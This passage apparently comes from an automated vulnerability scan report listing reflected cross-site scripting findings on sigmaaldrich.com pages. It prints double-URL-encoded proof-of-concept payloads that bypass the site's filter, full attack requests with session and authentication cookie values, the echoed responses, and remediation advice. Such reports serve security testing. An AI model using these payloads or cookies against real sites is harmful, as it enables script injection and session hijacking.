WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/cb5b4";alert(1)//ec1a260ed13","E404") ;
   </script>
...[SNIP]...

1.575. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/stem-cell-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b20%2522%253balert%25281%2529%252f%252f71cc7d9f3b0 was submitted in the REST URL parameter 1. This input was echoed as 26b20";alert(1)//71cc7d9f3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science26b20%2522%253balert%25281%2529%252f%252f71cc7d9f3b0/stem-cell-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science26b20";alert(1)//71cc7d9f3b0/stem-cell-biology.html","E404") ;
   </script>
...[SNIP]...

1.576. http://www.sigmaaldrich.com/life-science/stem-cell-biology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/stem-cell-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78272%2522%253balert%25281%2529%252f%252fd0ac7e987c1 was submitted in the REST URL parameter 2. This input was echoed as 78272";alert(1)//d0ac7e987c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/78272%2522%253balert%25281%2529%252f%252fd0ac7e987c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/78272";alert(1)//d0ac7e987c1","E404") ;
   </script>
...[SNIP]...

1.577. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b09c%2522%253balert%25281%2529%252f%252fafc4591bf96 was submitted in the REST URL parameter 1. This input was echoed as 1b09c";alert(1)//afc4591bf96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science1b09c%2522%253balert%25281%2529%252f%252fafc4591bf96/your-favorite-gene-search.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:36 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science1b09c";alert(1)//afc4591bf96/your-favorite-gene-search.html","E404") ;
   </script>
...[SNIP]...

1.578. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bbc4%2522%253balert%25281%2529%252f%252f294f16f8613 was submitted in the REST URL parameter 2. This input was echoed as 6bbc4";alert(1)//294f16f8613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/6bbc4%2522%253balert%25281%2529%252f%252f294f16f8613 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:38 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/6bbc4";alert(1)//294f16f8613","E404") ;
   </script>
...[SNIP]...

1.579. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33260%2522%253balert%25281%2529%252f%252fd3b818a82c5 was submitted in the REST URL parameter 1. This input was echoed as 33260";alert(1)//d3b818a82c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science33260%2522%253balert%25281%2529%252f%252fd3b818a82c5/your-favorite-gene-search/yfg-pbi.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
